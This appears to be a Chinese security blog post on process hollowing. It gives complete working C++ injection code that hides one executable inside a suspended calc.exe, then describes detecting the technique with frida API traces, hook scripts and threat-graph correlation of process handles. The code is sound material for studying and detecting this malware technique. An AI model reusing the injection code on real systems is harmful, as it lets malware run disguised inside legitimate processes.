进程掏空代码注入实现和使用威胁图的检测思路——本质上掏空就是在操作PE的加载,NtUnmapViewOfSection是核心,结合威胁图进行实体关系关联检测
在进程掏空代码注入技术中,攻击者创建一个处于挂起状态的新进程,然后从内存中取消映射其映像,改为写入恶意二进制文件,最后恢复程序状态以执行注入的代码。
注入步骤:
步骤1:创建一个处于挂起状态的新进程:
- 设置了CREATE_SUSPENDED标志的CreateProcessA()
步骤 2:交换其内存内容(取消映射/空化):
- NtUnmapViewOfSection()
步骤 3:在此未映射区域中输入恶意负载:
- VirtualAllocEx :分配新内存
- WriteProcessMemory():写入每个恶意软件部分以定位进程空间
步骤 4:将 EAX 设置为入口点:
- SetThreadContext()
步骤5:启动挂起的线程:
- ResumeThread()
注:下面代码使用calc.exe比较稳健,如果换成notepad在我的win10上可以注入成功,win11失败了。
进程掏空实现代码:
#include <iostream>
#include <Windows.h>
#include <winternl.h>
const char* sourceProcess = "c:\\windows\\syswow64\\calc.exe";
const char* targetProcess = "D:\\tmp\\Process-Hollowing-master\\executables\\HelloWorld.exe";
/* HelloWorld source code:
#include "stdafx.h"
#include <windows.h>
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
MessageBoxA(0, "Hello World", "Hello World", 0);
return 0;
}
*/
using NtUnmapViewOfSection = NTSTATUS(WINAPI*)(HANDLE, PVOID);
typedef struct BASE_RELOCATION_BLOCK {
DWORD PageAddress;
DWORD BlockSize;
} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;
typedef struct BASE_RELOCATION_ENTRY {
USHORT Offset : 12;
USHORT Type : 4;
} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;
typedef NTSTATUS(NTAPI *pfnNtQueryInformationProcess)(
IN HANDLE ProcessHandle,
IN PROCESSINFOCLASS ProcessInformationClass,
OUT PVOID ProcessInformation,
IN ULONG ProcessInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
pfnNtQueryInformationProcess gNtQueryInformationProcess;
HMODULE sm_LoadNTDLLFunctions()
{
// Load NTDLL Library and get entry address
// for NtQueryInformationProcess
HMODULE hNtDll = LoadLibrary(L"ntdll.dll");
if (hNtDll == NULL) return NULL;
gNtQueryInformationProcess = (pfnNtQueryInformationProcess)GetProcAddress(hNtDll, "NtQueryInformationProcess");
if (gNtQueryInformationProcess == NULL) {
FreeLibrary(hNtDll);
return NULL;
}
return hNtDll;
}
int main()
{
// create destination process - this is the process to be hollowed out
LPSTARTUPINFOA si = new STARTUPINFOA();
LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
PROCESS_BASIC_INFORMATION *pbi = new PROCESS_BASIC_INFORMATION();
DWORD returnLenght = 0;
CreateProcessA(NULL, (LPSTR)sourceProcess, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);
HANDLE destProcess = pi->hProcess;
// get destination imageBase offset address from the PEB
sm_LoadNTDLLFunctions();
// NtQueryInformationProcess
gNtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);
DWORD pebImageBaseOffset = (DWORD)pbi->PebBaseAddress + 8;
// get destination imageBaseAddress
LPVOID destImageBase = 0;
SIZE_T bytesRead = NULL;
ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, 4, &bytesRead);
// read source file - this is the file that will be executed inside the hollowed process
HANDLE sourceFile = CreateFileA(targetProcess, GENERIC_READ, NULL, NULL, OPEN_ALWAYS, NULL, NULL);
DWORD sourceFileSize = GetFileSize(sourceFile, NULL);
LPDWORD fileBytesRead = 0;
LPVOID sourceFileBytesBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sourceFileSize);
ReadFile(sourceFile, sourceFileBytesBuffer, sourceFileSize, NULL, NULL);
// get source image size
PIMAGE_DOS_HEADER sourceImageDosHeaders = (PIMAGE_DOS_HEADER)sourceFileBytesBuffer;
PIMAGE_NT_HEADERS sourceImageNTHeaders = (PIMAGE_NT_HEADERS)((DWORD)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew);
SIZE_T sourceImageSize = sourceImageNTHeaders->OptionalHeader.SizeOfImage;
// carve out the destination image
NtUnmapViewOfSection myNtUnmapViewOfSection = (NtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtUnmapViewOfSection"));
myNtUnmapViewOfSection(destProcess, destImageBase);
// allocate new memory in destination image for the source image
LPVOID newDestImageBase = VirtualAllocEx(destProcess, destImageBase, sourceImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
destImageBase = newDestImageBase;
// get delta between sourceImageBaseAddress and destinationImageBaseAddress
DWORD deltaImageBase = (DWORD)destImageBase - sourceImageNTHeaders->OptionalHeader.ImageBase;
// set sourceImageBase to destImageBase and copy the source Image headers to the destination image
sourceImageNTHeaders->OptionalHeader.ImageBase = (DWORD)destImageBase;
WriteProcessMemory(destProcess, newDestImageBase, sourceFileBytesBuffer, sourceImageNTHeaders->OptionalHeader.SizeOfHeaders, NULL);
// get pointer to first source image section
PIMAGE_SECTION_HEADER sourceImageSection = (PIMAGE_SECTION_HEADER)((DWORD)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
PIMAGE_SECTION_HEADER sourceImageSectionOld = sourceImageSection;
int err = GetLastError();
// copy source image sections to destination
for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)
{
PVOID destinationSectionLocation = (PVOID)((DWORD)destImageBase + sourceImageSection->VirtualAddress);
PVOID sourceSectionLocation = (PVOID)((DWORD)sourceFileBytesBuffer + sourceImageSection->PointerToRawData);
WriteProcessMemory(destProcess, destinationSectionLocation, sourceSectionLocation, sourceImageSection->SizeOfRawData, NULL);
sourceImageSection++;
}
// get address of the relocation table
IMAGE_DATA_DIRECTORY relocationTable = sourceImageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
// patch the binary with relocations
sourceImageSection = sourceImageSectionOld;
for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)
{
BYTE* relocSectionName = (BYTE*)".reloc";
if (memcmp(sourceImageSection->Name, relocSectionName, 5) != 0)
{
sourceImageSection++;
continue;
}
DWORD sourceRelocationTableRaw = sourceImageSection->PointerToRawData;
DWORD relocationOffset = 0;
while (relocationOffset < relocationTable.Size) {
PBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)((DWORD)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);
relocationOffset += sizeof(BASE_RELOCATION_BLOCK);
DWORD relocationEntryCount = (relocationBlock->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);
PBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)((DWORD)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);
for (DWORD y = 0; y < relocationEntryCount; y++)
{
relocationOffset += sizeof(BASE_RELOCATION_ENTRY);
if (relocationEntries[y].Type == 0)
{
continue;
}
DWORD patchAddress = relocationBlock->PageAddress + relocationEntries[y].Offset;
DWORD patchedBuffer = 0;
ReadProcessMemory(destProcess, (LPCVOID)((DWORD)destImageBase + patchAddress), &patchedBuffer, sizeof(DWORD), &bytesRead);
patchedBuffer += deltaImageBase;
WriteProcessMemory(destProcess, (PVOID)((DWORD)destImageBase + patchAddress), &patchedBuffer, sizeof(DWORD), fileBytesRead);
int a = GetLastError();
}
}
}
// get context of the dest process thread
LPCONTEXT context = new CONTEXT();
context->ContextFlags = CONTEXT_INTEGER;
GetThreadContext(pi->hThread, context);
// update dest image entry point to the new entry point of the source image and resume dest image thread
DWORD patchedEntryPoint = (DWORD)destImageBase + sourceImageNTHeaders->OptionalHeader.AddressOfEntryPoint;
context->Eax = patchedEntryPoint;
SetThreadContext(pi->hThread, context);
ResumeThread(pi->hThread);
return 0;
}
效果:
看到的计算器的进程任务图标,实际上运行的是hello world
从process explorer看到的效果,加载的模块里没有注入的image 镜像文件。
当然,如果是使用vmmap工具查看vad的话,也是什么都没有的!所以从内存直观上去取证有难度!不过,业界有一些内存异常检测的思路回头再分享。
安全检测分析
接下来,我们分析下应该如何检测:
首先,
[out] lpProcessInformation
A pointer to a PROCESS_INFORMATION structure that receives identification information about the new process.
Handles in PROCESS_INFORMATION must be closed with CloseHandle when they are no longer needed.
也就是后续操作这个进程就在pi结果变量里了!
当然,OS API数据采集的时候,CREATE_SUSPENDED 这个标识要记住。
接下来是unmap,取消镜像映射:
可以看到操作的是同一个processID。
AllocMemory也是一样:
copy PE头和PE节的部分,也是操作同一个进程句柄:
以及重定向reloc修复,也是写的同一个进程句柄:
最后就是设置进程上下文并继续运行:
用的都是前面createprocess返回的进程pi变量值。
好了,有了上面的数据分析,我们就知道应该如何检测进程掏空了。使用威胁图的思路,将创建进程的pi句柄和线程句柄和几个os API调用实体关系关联,就可以知道是进程掏空了。
基于frida数据采集和检测思路:
为了实现检测,我们使用frida 进行数据采集:
frida-trace -i "VirtualAllocEx" -i "NtUnmapViewOfSection" -i "ResumeThread" -i "SetThreadContext" -i "CreateProcessA" -f prcoss_hollowing_test.exe
Instrumenting...
VirtualAllocEx: Loaded handler at "C:\\Users\\xxx\\source\\repos\\prcoss_hollowing_test\\Debug\\__handlers__\\KERNEL32.DLL\\VirtualAllocEx.js"
ResumeThread: Loaded handler at "C:\\Users\\xxx\\source\\repos\\prcoss_hollowing_test\\Debug\\__handlers__\\KERNEL32.DLL\\ResumeThread.js"
SetThreadContext: Loaded handler at "C:\\Users\\xxx\\source\\repos\\prcoss_hollowing_test\\Debug\\__handlers__\\KERNEL32.DLL\\SetThreadContext.js"
CreateProcessA: Loaded handler at "C:\\Users\\xxx\\source\\repos\\prcoss_hollowing_test\\Debug\\__handlers__\\KERNEL32.DLL\\CreateProcessA.js"
VirtualAllocEx: Loaded handler at "C:\\Users\\xxx\\source\\repos\\prcoss_hollowing_test\\Debug\\__handlers__\\KERNELBASE.dll\\VirtualAllocEx.js"
ResumeThread: Loaded handler at "C:\\Users\\xxx\\source\\repos\\prcoss_hollowing_test\\Debug\\__handlers__\\KERNELBASE.dll\\ResumeThread.js"
SetThreadContext: Loaded handler at "C:\\Users\\xxx\\source\\repos\\prcoss_hollowing_test\\Debug\\__handlers__\\KERNELBASE.dll\\SetThreadContext.js"
CreateProcessA: Loaded handler at "C:\\Users\\xxx\\source\\repos\\prcoss_hollowing_test\\Debug\\__handlers__\\KERNELBASE.dll\\CreateProcessA.js"
NtUnmapViewOfSection: Loaded handler at "C:\\Users\\xxx\\source\\repos\\prcoss_hollowing_test\\Debug\\__handlers__\\ntdll.dll\\NtUnmapViewOfSection.js"
Started tracing 9 functions. Press Ctrl+C to stop.
/* TID 0x9cc4 */
8 ms CreateProcessA()
8 ms | CreateProcessA()
8 ms | CreateProcessA process name:null
8 ms | CreateProcessA CMD line:c:\windows\syswow64\calc.exe
18 ms | CreateProcessA process handle:368 thread handle:356
19 ms NtUnmapViewOfSection()
19 ms NtUnmapViewOfSection process handle:0x170 int32:368
19 ms NtUnmapViewOfSection process addr:0xbe0000
19 ms VirtualAllocEx()
19 ms | VirtualAllocEx()
19 ms | VirtualAllocEx process handle:0x170 int32:368
22 ms SetThreadContext()
22 ms | SetThreadContext()
22 ms | SetThreadContext thread handle:0x164 int32:356
22 ms ResumeThread()
22 ms | ResumeThread()
22 ms | ResumeThread thread handle:0x164 int32:356
Process terminated
可以看到进程ID和线程ID都是如前面预料的一样!为了实现上述采集,我的frida js是这样写的:
分别是:
onEnter(log, args, state) {
log('NtUnmapViewOfSection()');
log(' NtUnmapViewOfSection process handle:' + args[0] + " int32:" + args[0].toInt32());
log(' NtUnmapViewOfSection process addr:' + args[1]);
}
onEnter(log, args, state) {
log('CreateProcessA()');
log(' CreateProcessA process name:' + Memory.readUtf8String(args[0]));
log(' CreateProcessA CMD line:' + Memory.readUtf8String(args[1]));
this.arg10 = args[9];
},
/**
* Called synchronously when about to return from CreateProcessA.
*
* See onEnter for details.
*
* @this {object} - Object allowing you to access state stored in onEnter.
* @param {function} log - Call this function with a string to be presented to the user.
* @param {NativePointer} retval - Return value represented as a NativePointer object.
* @param {object} state - Object allowing you to keep state across function calls.
*/
onLeave(log, retval, state) {
var process_addr = Memory.readPointer(this.arg10);
var thread_addr = Memory.readPointer(this.arg10.add(4));
log(" CreateProcessA process handle:" + process_addr.toInt32() + " thread handle:" + thread_addr.toInt32());
}
创建进程那里稍微繁琐点,需要取进程和线程句柄地址。
onEnter(log, args, state) {
log('ResumeThread()');
log(' ResumeThread thread handle:' + args[0] + " int32:" + args[0].toInt32());
}
onEnter(log, args, state) {
log('SetThreadContext()');
log(' SetThreadContext thread handle:' + args[0] + " int32:" + args[0].toInt32());
},
onEnter(log, args, state) {
log('VirtualAllocEx()');
log(' VirtualAllocEx process handle:' + args[0] + " int32:" + args[0].toInt32());
}
总结:
进程掏空代码注入实现和使用威胁图的检测思路——本质上掏空就是在操作PE的加载,NtUnmapViewOfSection是核心,结合威胁图进行实体关系关联可以很准确检测。
其他注意事项:如果是使用writeprocess memory采集的话,非常之多,对于这个例子有1000多个api调用,心态炸裂:
frida-trace -i "VirtualAllocEx" -i "WriteProcessMemory" -i "NtUnmapViewOfSection" -i "ResumeThread" -i "SetThreadContext" -i "CreateProcessA" -f prcoss_hollowing_test.exe
Instrumenting...
/* TID 0xab94 */
8 ms CreateProcessA()
8 ms | CreateProcessA()
8 ms | CreateProcessA process name:null
8 ms | CreateProcessA CMD line:c:\windows\syswow64\calc.exe
14 ms | CreateProcessA process handle:740 thread handle:736
14 ms NtUnmapViewOfSection()
14 ms NtUnmapViewOfSection process handle:0x2e4 int32:740
14 ms NtUnmapViewOfSection process addr:0xbe0000
14 ms VirtualAllocEx()
14 ms | VirtualAllocEx()
14 ms | VirtualAllocEx process handle:0x2e4 int32:740
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
14 ms | WriteProcessMemory()
14 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
15 ms WriteProcessMemory()
15 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
16 ms | WriteProcessMemory()
16 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
17 ms WriteProcessMemory()
17 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
18 ms | WriteProcessMemory()
18 ms WriteProcessMemory()
